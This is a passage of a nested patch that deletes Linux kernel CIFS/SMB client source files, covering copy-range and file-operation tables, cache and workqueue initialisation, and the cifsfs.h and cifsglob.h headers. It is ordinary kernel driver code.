+-		goto out;
+-	}
+-
+-	rc = -EXDEV;
+-	smb_file_target = dst_file->private_data;
+-	smb_file_src = src_file->private_data;
+-	src_tcon = tlink_tcon(smb_file_src->tlink);
+-	target_tcon = tlink_tcon(smb_file_target->tlink);
+-
+-	if (src_tcon->ses != target_tcon->ses) {
+-		cifs_dbg(VFS, "source and target of copy not on same server\n");
+-		goto out;
+-	}
+-
+-	rc = -EOPNOTSUPP;
+-	if (!target_tcon->ses->server->ops->copychunk_range)
+-		goto out;
+-
+-	/*
+-	 * Note: cifs case is easier than btrfs since server responsible for
+-	 * checks for proper open modes and file type and if it wants
+-	 * server could even support copy of range where source = target
+-	 */
+-	lock_two_nondirectories(target_inode, src_inode);
+-
+-	cifs_dbg(FYI, "about to flush pages\n");
+-
+-	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
+-					  off + len - 1);
+-	if (rc)
+-		goto unlock;
+-
+-	/* should we flush first and last page first */
+-	truncate_inode_pages(&target_inode->i_data, 0);
+-
+-	rc = file_modified(dst_file);
+-	if (!rc)
+-		rc = target_tcon->ses->server->ops->copychunk_range(xid,
+-			smb_file_src, smb_file_target, off, len, destoff);
+-
+-	file_accessed(src_file);
+-
+-	/* force revalidate of size and timestamps of target file now
+-	 * that target is updated on the server
+-	 */
+-	CIFS_I(target_inode)->time = 0;
+-
+-unlock:
+-	/* although unlocking in the reverse order from locking is not
+-	 * strictly necessary here it is a little cleaner to be consistent
+-	 */
+-	unlock_two_nondirectories(src_inode, target_inode);
+-
+-out:
+-	return rc;
+-}
+-
+-/*
+- * Directory operations under CIFS/SMB2/SMB3 are synchronous, so fsync()
+- * is a dummy operation.
+- */
+-static int cifs_dir_fsync(struct file *file, loff_t start, loff_t end, int datasync)
+-{
+-	cifs_dbg(FYI, "Sync directory - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	return 0;
+-}
+-
+-static ssize_t cifs_copy_file_range(struct file *src_file, loff_t off,
+-				struct file *dst_file, loff_t destoff,
+-				size_t len, unsigned int flags)
+-{
+-	unsigned int xid = get_xid();
+-	ssize_t rc;
+-	struct cifsFileInfo *cfile = dst_file->private_data;
+-
+-	if (cfile->swapfile) {
+-		rc = -EOPNOTSUPP;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	rc = cifs_file_copychunk_range(xid, src_file, off, dst_file, destoff,
+-					len, flags);
+-	free_xid(xid);
+-
+-	if (rc == -EOPNOTSUPP || rc == -EXDEV)
+-		rc = generic_copy_file_range(src_file, off, dst_file,
+-					     destoff, len, flags);
+-	return rc;
+-}
+-
+-const struct file_operations cifs_file_ops = {
+-	.read_iter = cifs_loose_read_iter,
+-	.write_iter = cifs_file_write_iter,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap  = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_strict_ops = {
+-	.read_iter = cifs_strict_readv,
+-	.write_iter = cifs_strict_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_strict_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_strict_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_direct_ops = {
+-	.read_iter = cifs_direct_readv,
+-	.write_iter = cifs_direct_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = cifs_llseek,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_nobrl_ops = {
+-	.read_iter = cifs_loose_read_iter,
+-	.write_iter = cifs_file_write_iter,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap  = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_strict_nobrl_ops = {
+-	.read_iter = cifs_strict_readv,
+-	.write_iter = cifs_strict_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_strict_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_strict_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_direct_nobrl_ops = {
+-	.read_iter = cifs_direct_readv,
+-	.write_iter = cifs_direct_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = cifs_llseek,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_dir_ops = {
+-	.iterate_shared = cifs_readdir,
+-	.release = cifs_closedir,
+-	.read    = generic_read_dir,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = generic_file_llseek,
+-	.fsync = cifs_dir_fsync,
+-};
+-
+-static void
+-cifs_init_once(void *inode)
+-{
+-	struct cifsInodeInfo *cifsi = inode;
+-
+-	inode_init_once(&cifsi->netfs.inode);
+-	init_rwsem(&cifsi->lock_sem);
+-}
+-
+-static int __init
+-cifs_init_inodecache(void)
+-{
+-	cifs_inode_cachep = kmem_cache_create("cifs_inode_cache",
+-					      sizeof(struct cifsInodeInfo),
+-					      0, (SLAB_RECLAIM_ACCOUNT|
+-						SLAB_MEM_SPREAD|SLAB_ACCOUNT),
+-					      cifs_init_once);
+-	if (cifs_inode_cachep == NULL)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+-static void
+-cifs_destroy_inodecache(void)
+-{
+-	/*
+-	 * Make sure all delayed rcu free inodes are flushed before we
+-	 * destroy cache.
+-	 */
+-	rcu_barrier();
+-	kmem_cache_destroy(cifs_inode_cachep);
+-}
+-
+-static int
+-cifs_init_request_bufs(void)
+-{
+-	/*
+-	 * SMB2 maximum header size is bigger than CIFS one - no problems to
+-	 * allocate some more bytes for CIFS.
+-	 */
+-	size_t max_hdr_size = MAX_SMB2_HDR_SIZE;
+-
+-	if (CIFSMaxBufSize < 8192) {
+-	/* Buffer size can not be smaller than 2 * PATH_MAX since maximum
+-	Unicode path name has to fit in any SMB/CIFS path based frames */
+-		CIFSMaxBufSize = 8192;
+-	} else if (CIFSMaxBufSize > 1024*127) {
+-		CIFSMaxBufSize = 1024 * 127;
+-	} else {
+-		CIFSMaxBufSize &= 0x1FE00; /* Round size to even 512 byte mult*/
+-	}
+-/*
+-	cifs_dbg(VFS, "CIFSMaxBufSize %d 0x%x\n",
+-		 CIFSMaxBufSize, CIFSMaxBufSize);
+-*/
+-	cifs_req_cachep = kmem_cache_create_usercopy("cifs_request",
+-					    CIFSMaxBufSize + max_hdr_size, 0,
+-					    SLAB_HWCACHE_ALIGN, 0,
+-					    CIFSMaxBufSize + max_hdr_size,
+-					    NULL);
+-	if (cifs_req_cachep == NULL)
+-		return -ENOMEM;
+-
+-	if (cifs_min_rcv < 1)
+-		cifs_min_rcv = 1;
+-	else if (cifs_min_rcv > 64) {
+-		cifs_min_rcv = 64;
+-		cifs_dbg(VFS, "cifs_min_rcv set to maximum (64)\n");
+-	}
+-
+-	cifs_req_poolp = mempool_create_slab_pool(cifs_min_rcv,
+-						  cifs_req_cachep);
+-
+-	if (cifs_req_poolp == NULL) {
+-		kmem_cache_destroy(cifs_req_cachep);
+-		return -ENOMEM;
+-	}
+-	/* MAX_CIFS_SMALL_BUFFER_SIZE bytes is enough for most SMB responses and
+-	almost all handle based requests (but not write response, nor is it
+-	sufficient for path based requests).  A smaller size would have
+-	been more efficient (compacting multiple slab items on one 4k page)
+-	for the case in which debug was on, but this larger size allows
+-	more SMBs to use small buffer alloc and is still much more
+-	efficient to alloc 1 per page off the slab compared to 17K (5page)
+-	alloc of large cifs buffers even when page debugging is on */
+-	cifs_sm_req_cachep = kmem_cache_create_usercopy("cifs_small_rq",
+-			MAX_CIFS_SMALL_BUFFER_SIZE, 0, SLAB_HWCACHE_ALIGN,
+-			0, MAX_CIFS_SMALL_BUFFER_SIZE, NULL);
+-	if (cifs_sm_req_cachep == NULL) {
+-		mempool_destroy(cifs_req_poolp);
+-		kmem_cache_destroy(cifs_req_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	if (cifs_min_small < 2)
+-		cifs_min_small = 2;
+-	else if (cifs_min_small > 256) {
+-		cifs_min_small = 256;
+-		cifs_dbg(FYI, "cifs_min_small set to maximum (256)\n");
+-	}
+-
+-	cifs_sm_req_poolp = mempool_create_slab_pool(cifs_min_small,
+-						     cifs_sm_req_cachep);
+-
+-	if (cifs_sm_req_poolp == NULL) {
+-		mempool_destroy(cifs_req_poolp);
+-		kmem_cache_destroy(cifs_req_cachep);
+-		kmem_cache_destroy(cifs_sm_req_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-
+-static void
+-cifs_destroy_request_bufs(void)
+-{
+-	mempool_destroy(cifs_req_poolp);
+-	kmem_cache_destroy(cifs_req_cachep);
+-	mempool_destroy(cifs_sm_req_poolp);
+-	kmem_cache_destroy(cifs_sm_req_cachep);
+-}
+-
+-static int init_mids(void)
+-{
+-	cifs_mid_cachep = kmem_cache_create("cifs_mpx_ids",
+-					    sizeof(struct mid_q_entry), 0,
+-					    SLAB_HWCACHE_ALIGN, NULL);
+-	if (cifs_mid_cachep == NULL)
+-		return -ENOMEM;
+-
+-	/* 3 is a reasonable minimum number of simultaneous operations */
+-	cifs_mid_poolp = mempool_create_slab_pool(3, cifs_mid_cachep);
+-	if (cifs_mid_poolp == NULL) {
+-		kmem_cache_destroy(cifs_mid_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-
+-static void destroy_mids(void)
+-{
+-	mempool_destroy(cifs_mid_poolp);
+-	kmem_cache_destroy(cifs_mid_cachep);
+-}
+-
+-static int __init
+-init_cifs(void)
+-{
+-	int rc = 0;
+-	cifs_proc_init();
+-	INIT_LIST_HEAD(&cifs_tcp_ses_list);
+-/*
+- *  Initialize Global counters
+- */
+-	atomic_set(&sesInfoAllocCount, 0);
+-	atomic_set(&tconInfoAllocCount, 0);
+-	atomic_set(&tcpSesNextId, 0);
+-	atomic_set(&tcpSesAllocCount, 0);
+-	atomic_set(&tcpSesReconnectCount, 0);
+-	atomic_set(&tconInfoReconnectCount, 0);
+-
+-	atomic_set(&buf_alloc_count, 0);
+-	atomic_set(&small_buf_alloc_count, 0);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_set(&total_buf_alloc_count, 0);
+-	atomic_set(&total_small_buf_alloc_count, 0);
+-	if (slow_rsp_threshold < 1)
+-		cifs_dbg(FYI, "slow_response_threshold msgs disabled\n");
+-	else if (slow_rsp_threshold > 32767)
+-		cifs_dbg(VFS,
+-		       "slow response threshold set higher than recommended (0 to 32767)\n");
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	atomic_set(&mid_count, 0);
+-	GlobalCurrentXid = 0;
+-	GlobalTotalActiveXid = 0;
+-	GlobalMaxActiveXid = 0;
+-	spin_lock_init(&cifs_tcp_ses_lock);
+-	spin_lock_init(&GlobalMid_Lock);
+-
+-	cifs_lock_secret = get_random_u32();
+-
+-	if (cifs_max_pending < 2) {
+-		cifs_max_pending = 2;
+-		cifs_dbg(FYI, "cifs_max_pending set to min of 2\n");
+-	} else if (cifs_max_pending > CIFS_MAX_REQ) {
+-		cifs_max_pending = CIFS_MAX_REQ;
+-		cifs_dbg(FYI, "cifs_max_pending set to max of %u\n",
+-			 CIFS_MAX_REQ);
+-	}
+-
+-	cifsiod_wq = alloc_workqueue("cifsiod", WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!cifsiod_wq) {
+-		rc = -ENOMEM;
+-		goto out_clean_proc;
+-	}
+-
+-	/*
+-	 * Consider in future setting limit!=0 maybe to min(num_of_cores - 1, 3)
+-	 * so that we don't launch too many worker threads but
+-	 * Documentation/core-api/workqueue.rst recommends setting it to 0
+-	 */
+-
+-	/* WQ_UNBOUND allows decrypt tasks to run on any CPU */
+-	decrypt_wq = alloc_workqueue("smb3decryptd",
+-				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!decrypt_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_cifsiod_wq;
+-	}
+-
+-	fileinfo_put_wq = alloc_workqueue("cifsfileinfoput",
+-				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!fileinfo_put_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_decrypt_wq;
+-	}
+-
+-	cifsoplockd_wq = alloc_workqueue("cifsoplockd",
+-					 WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!cifsoplockd_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_fileinfo_put_wq;
+-	}
+-
+-	deferredclose_wq = alloc_workqueue("deferredclose",
+-					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!deferredclose_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_cifsoplockd_wq;
+-	}
+-
+-	rc = cifs_init_inodecache();
+-	if (rc)
+-		goto out_destroy_deferredclose_wq;
+-
+-	rc = init_mids();
+-	if (rc)
+-		goto out_destroy_inodecache;
+-
+-	rc = cifs_init_request_bufs();
+-	if (rc)
+-		goto out_destroy_mids;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	rc = dfs_cache_init();
+-	if (rc)
+-		goto out_destroy_request_bufs;
+-#endif /* CONFIG_CIFS_DFS_UPCALL */
+-#ifdef CONFIG_CIFS_UPCALL
+-	rc = init_cifs_spnego();
+-	if (rc)
+-		goto out_destroy_dfs_cache;
+-#endif /* CONFIG_CIFS_UPCALL */
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	rc = cifs_genl_init();
+-	if (rc)
+-		goto out_register_key_type;
+-#endif /* CONFIG_CIFS_SWN_UPCALL */
+-
+-	rc = init_cifs_idmap();
+-	if (rc)
+-		goto out_cifs_swn_init;
+-
+-	rc = register_filesystem(&cifs_fs_type);
+-	if (rc)
+-		goto out_init_cifs_idmap;
+-
+-	rc = register_filesystem(&smb3_fs_type);
+-	if (rc) {
+-		unregister_filesystem(&cifs_fs_type);
+-		goto out_init_cifs_idmap;
+-	}
+-
+-	return 0;
+-
+-out_init_cifs_idmap:
+-	exit_cifs_idmap();
+-out_cifs_swn_init:
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	cifs_genl_exit();
+-out_register_key_type:
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	exit_cifs_spnego();
+-out_destroy_dfs_cache:
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_destroy();
+-out_destroy_request_bufs:
+-#endif
+-	cifs_destroy_request_bufs();
+-out_destroy_mids:
+-	destroy_mids();
+-out_destroy_inodecache:
+-	cifs_destroy_inodecache();
+-out_destroy_deferredclose_wq:
+-	destroy_workqueue(deferredclose_wq);
+-out_destroy_cifsoplockd_wq:
+-	destroy_workqueue(cifsoplockd_wq);
+-out_destroy_fileinfo_put_wq:
+-	destroy_workqueue(fileinfo_put_wq);
+-out_destroy_decrypt_wq:
+-	destroy_workqueue(decrypt_wq);
+-out_destroy_cifsiod_wq:
+-	destroy_workqueue(cifsiod_wq);
+-out_clean_proc:
+-	cifs_proc_clean();
+-	return rc;
+-}
+-
+-static void __exit
+-exit_cifs(void)
+-{
+-	cifs_dbg(NOISY, "exit_smb3\n");
+-	unregister_filesystem(&cifs_fs_type);
+-	unregister_filesystem(&smb3_fs_type);
+-	cifs_dfs_release_automount_timer();
+-	exit_cifs_idmap();
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	cifs_genl_exit();
+-#endif
+-#ifdef CONFIG_CIFS_UPCALL
+-	exit_cifs_spnego();
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	dfs_cache_destroy();
+-#endif
+-	cifs_destroy_request_bufs();
+-	destroy_mids();
+-	cifs_destroy_inodecache();
+-	destroy_workqueue(deferredclose_wq);
+-	destroy_workqueue(cifsoplockd_wq);
+-	destroy_workqueue(decrypt_wq);
+-	destroy_workqueue(fileinfo_put_wq);
+-	destroy_workqueue(cifsiod_wq);
+-	cifs_proc_clean();
+-}
+-
+-MODULE_AUTHOR("Steve French");
+-MODULE_LICENSE("GPL");	/* combination of LGPL + GPL source behaves as GPL */
+-MODULE_DESCRIPTION
+-	("VFS to access SMB3 servers e.g. Samba, Macs, Azure and Windows (and "
+-	"also older servers complying with the SNIA CIFS Specification)");
+-MODULE_VERSION(CIFS_VERSION);
+-MODULE_SOFTDEP("ecb");
+-MODULE_SOFTDEP("hmac");
+-MODULE_SOFTDEP("md5");
+-MODULE_SOFTDEP("nls");
+-MODULE_SOFTDEP("aes");
+-MODULE_SOFTDEP("cmac");
+-MODULE_SOFTDEP("sha256");
+-MODULE_SOFTDEP("sha512");
+-MODULE_SOFTDEP("aead2");
+-MODULE_SOFTDEP("ccm");
+-MODULE_SOFTDEP("gcm");
+-module_init(init_cifs)
+-module_exit(exit_cifs)
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+deleted file mode 100644
+index b6c38896fb2db..0000000000000
+--- a/fs/cifs/cifsfs.h
++++ /dev/null
+@@ -1,161 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002, 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _CIFSFS_H
+-#define _CIFSFS_H
+-
+-#include <linux/hash.h>
+-
+-#define ROOT_I 2
+-
+-/*
+- * ino_t is 32-bits on 32-bit arch. We have to squash the 64-bit value down
+- * so that it will fit. We use hash_64 to convert the value to 31 bits, and
+- * then add 1, to ensure that we don't end up with a 0 as the value.
+- */
+-static inline ino_t
+-cifs_uniqueid_to_ino_t(u64 fileid)
+-{
+-	if ((sizeof(ino_t)) < (sizeof(u64)))
+-		return (ino_t)hash_64(fileid, (sizeof(ino_t) * 8) - 1) + 1;
+-
+-	return (ino_t)fileid;
+-
+-}
+-
+-static inline void cifs_set_time(struct dentry *dentry, unsigned long time)
+-{
+-	dentry->d_fsdata = (void *) time;
+-}
+-
+-static inline unsigned long cifs_get_time(struct dentry *dentry)
+-{
+-	return (unsigned long) dentry->d_fsdata;
+-}
+-
+-extern struct file_system_type cifs_fs_type, smb3_fs_type;
+-extern const struct address_space_operations cifs_addr_ops;
+-extern const struct address_space_operations cifs_addr_ops_smallbuf;
+-
+-/* Functions related to super block operations */
+-extern void cifs_sb_active(struct super_block *sb);
+-extern void cifs_sb_deactive(struct super_block *sb);
+-
+-/* Functions related to inodes */
+-extern const struct inode_operations cifs_dir_inode_ops;
+-extern struct inode *cifs_root_iget(struct super_block *);
+-extern int cifs_create(struct user_namespace *, struct inode *,
+-		       struct dentry *, umode_t, bool excl);
+-extern int cifs_atomic_open(struct inode *, struct dentry *,
+-			    struct file *, unsigned, umode_t);
+-extern struct dentry *cifs_lookup(struct inode *, struct dentry *,
+-				  unsigned int);
+-extern int cifs_unlink(struct inode *dir, struct dentry *dentry);
+-extern int cifs_hardlink(struct dentry *, struct inode *, struct dentry *);
+-extern int cifs_mknod(struct user_namespace *, struct inode *, struct dentry *,
+-		      umode_t, dev_t);
+-extern int cifs_mkdir(struct user_namespace *, struct inode *, struct dentry *,
+-		      umode_t);
+-extern int cifs_rmdir(struct inode *, struct dentry *);
+-extern int cifs_rename2(struct user_namespace *, struct inode *,
+-			struct dentry *, struct inode *, struct dentry *,
+-			unsigned int);
+-extern int cifs_revalidate_file_attr(struct file *filp);
+-extern int cifs_revalidate_dentry_attr(struct dentry *);
+-extern int cifs_revalidate_file(struct file *filp);
+-extern int cifs_revalidate_dentry(struct dentry *);
+-extern int cifs_invalidate_mapping(struct inode *inode);
+-extern int cifs_revalidate_mapping(struct inode *inode);
+-extern int cifs_zap_mapping(struct inode *inode);
+-extern int cifs_getattr(struct user_namespace *, const struct path *,
+-			struct kstat *, u32, unsigned int);
+-extern int cifs_setattr(struct user_namespace *, struct dentry *,
+-			struct iattr *);
+-extern int cifs_fiemap(struct inode *, struct fiemap_extent_info *, u64 start,
+-		       u64 len);
+-
+-extern const struct inode_operations cifs_file_inode_ops;
+-extern const struct inode_operations cifs_symlink_inode_ops;
+-extern const struct inode_operations cifs_dfs_referral_inode_operations;
+-
+-
+-/* Functions related to files and directories */
+-extern const struct file_operations cifs_file_ops;
+-extern const struct file_operations cifs_file_direct_ops; /* if directio mnt */
+-extern const struct file_operations cifs_file_strict_ops; /* if strictio mnt */
+-extern const struct file_operations cifs_file_nobrl_ops; /* no brlocks */
+-extern const struct file_operations cifs_file_direct_nobrl_ops;
+-extern const struct file_operations cifs_file_strict_nobrl_ops;
+-extern int cifs_open(struct inode *inode, struct file *file);
+-extern int cifs_close(struct inode *inode, struct file *file);
+-extern int cifs_closedir(struct inode *inode, struct file *file);
+-extern ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to);
+-extern ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern ssize_t cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from);
+-extern int cifs_flock(struct file *pfile, int cmd, struct file_lock *plock);
+-extern int cifs_lock(struct file *, int, struct file_lock *);
+-extern int cifs_fsync(struct file *, loff_t, loff_t, int);
+-extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
+-extern int cifs_flush(struct file *, fl_owner_t id);
+-extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
+-extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
+-extern const struct file_operations cifs_dir_ops;
+-extern int cifs_dir_open(struct inode *inode, struct file *file);
+-extern int cifs_readdir(struct file *file, struct dir_context *ctx);
+-
+-/* Functions related to dir entries */
+-extern const struct dentry_operations cifs_dentry_ops;
+-extern const struct dentry_operations cifs_ci_dentry_ops;
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+-#else
+-static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
+-{
+-	return ERR_PTR(-EREMOTE);
+-}
+-#endif
+-
+-/* Functions related to symlinks */
+-extern const char *cifs_get_link(struct dentry *, struct inode *,
+-			struct delayed_call *);
+-extern int cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
+-			struct dentry *direntry, const char *symname);
+-
+-#ifdef CONFIG_CIFS_XATTR
+-extern const struct xattr_handler *cifs_xattr_handlers[];
+-extern ssize_t	cifs_listxattr(struct dentry *, char *, size_t);
+-#else
+-# define cifs_xattr_handlers NULL
+-# define cifs_listxattr NULL
+-#endif
+-
+-extern ssize_t cifs_file_copychunk_range(unsigned int xid,
+-					struct file *src_file, loff_t off,
+-					struct file *dst_file, loff_t destoff,
+-					size_t len, unsigned int flags);
+-
+-extern long cifs_ioctl(struct file *filep, unsigned int cmd, unsigned long arg);
+-extern void cifs_setsize(struct inode *inode, loff_t offset);
+-extern int cifs_truncate_page(struct address_space *mapping, loff_t from);
+-
+-struct smb3_fs_context;
+-extern struct dentry *cifs_smb3_do_mount(struct file_system_type *fs_type,
+-					 int flags, struct smb3_fs_context *ctx);
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-extern const struct export_operations cifs_export_ops;
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
+-/* when changing internal version - update following two lines at same time */
+-#define SMB3_PRODUCT_BUILD 40
+-#define CIFS_VERSION   "2.40"
+-#endif				/* _CIFSFS_H */
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+deleted file mode 100644
+index 6ec1a34738e27..0000000000000
+--- a/fs/cifs/cifsglob.h
++++ /dev/null
+@@ -1,2208 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *
+- */
+-#ifndef _CIFS_GLOB_H
+-#define _CIFS_GLOB_H
+-
+-#include <linux/in.h>
+-#include <linux/in6.h>
+-#include <linux/inet.h>
+-#include <linux/slab.h>
+-#include <linux/scatterlist.h>
+-#include <linux/mm.h>
+-#include <linux/mempool.h>
+-#include <linux/workqueue.h>
+-#include <linux/utsname.h>
+-#include <linux/sched/mm.h>
+-#include <linux/netfs.h>
+-#include "cifs_fs_sb.h"
+-#include "cifsacl.h"
+-#include <crypto/internal/hash.h>
+-#include <linux/scatterlist.h>
+-#include <uapi/linux/cifs/cifs_mount.h>
+-#include "../smbfs_common/smb2pdu.h"
+-#include "smb2pdu.h"
+-
+-#define SMB_PATH_MAX 260
+-#define CIFS_PORT 445
+-#define RFC1001_PORT 139
+-
+-/*
+- * The sizes of various internal tables and strings
+- */
+-#define MAX_UID_INFO 16
+-#define MAX_SES_INFO 2
+-#define MAX_TCON_INFO 4
+-
+-#define MAX_TREE_SIZE (2 + CIFS_NI_MAXHOST + 1 + CIFS_MAX_SHARE_LEN + 1)
+-
+-#define CIFS_MIN_RCV_POOL 4
+-
+-#define MAX_REOPEN_ATT	5 /* these many maximum attempts to reopen a file */
+-/*
+- * default attribute cache timeout (jiffies)
+- */
+-#define CIFS_DEF_ACTIMEO (1 * HZ)
+-
+-/*
+- * max attribute cache timeout (jiffies) - 2^30
+- */
+-#define CIFS_MAX_ACTIMEO (1 << 30)
+-
+-/*
+- * Max persistent and resilient handle timeout (milliseconds).
+- * Windows durable max was 960000 (16 minutes)
+- */
+-#define SMB3_MAX_HANDLE_TIMEOUT 960000
+-
+-/*
+- * MAX_REQ is the maximum number of requests that WE will send
+- * on one socket concurrently.
+- */
+-#define CIFS_MAX_REQ 32767
+-
+-#define RFC1001_NAME_LEN 15
+-#define RFC1001_NAME_LEN_WITH_NULL (RFC1001_NAME_LEN + 1)
+-
+-/* maximum length of ip addr as a string (including ipv6 and sctp) */
+-#define SERVER_NAME_LENGTH 80
+-#define SERVER_NAME_LEN_WITH_NULL     (SERVER_NAME_LENGTH + 1)
+-
+-/* echo interval in seconds */
+-#define SMB_ECHO_INTERVAL_MIN 1
+-#define SMB_ECHO_INTERVAL_MAX 600
+-#define SMB_ECHO_INTERVAL_DEFAULT 60
+-
+-/* dns resolution intervals in seconds */
+-#define SMB_DNS_RESOLVE_INTERVAL_MIN     120
+-#define SMB_DNS_RESOLVE_INTERVAL_DEFAULT 600
+-
+-/* smb multichannel query server interfaces interval in seconds */
+-#define SMB_INTERFACE_POLL_INTERVAL	600
+-
+-/* maximum number of PDUs in one compound */
+-#define MAX_COMPOUND 5
+-
+-/*
+- * Default number of credits to keep available for SMB3.
+- * This value is chosen somewhat arbitrarily. The Windows client
+- * defaults to 128 credits, the Windows server allows clients up to
+- * 512 credits (or 8K for later versions), and the NetApp server
+- * does not limit clients at all.  Choose a high enough default value
+- * such that the client shouldn't limit performance, but allow mount
+- * to override (until you approach 64K, where we limit credits to 65000
+- * to reduce possibility of seeing more server credit overflow bugs.
+- */
+-#define SMB2_MAX_CREDITS_AVAILABLE 32000
+-
+-#include "cifspdu.h"
+-
+-#ifndef XATTR_DOS_ATTRIB
+-#define XATTR_DOS_ATTRIB "user.DOSATTRIB"
+-#endif
+-
+-#define CIFS_MAX_WORKSTATION_LEN  (__NEW_UTS_LEN + 1)  /* reasonable max for client */
+-
+-/*
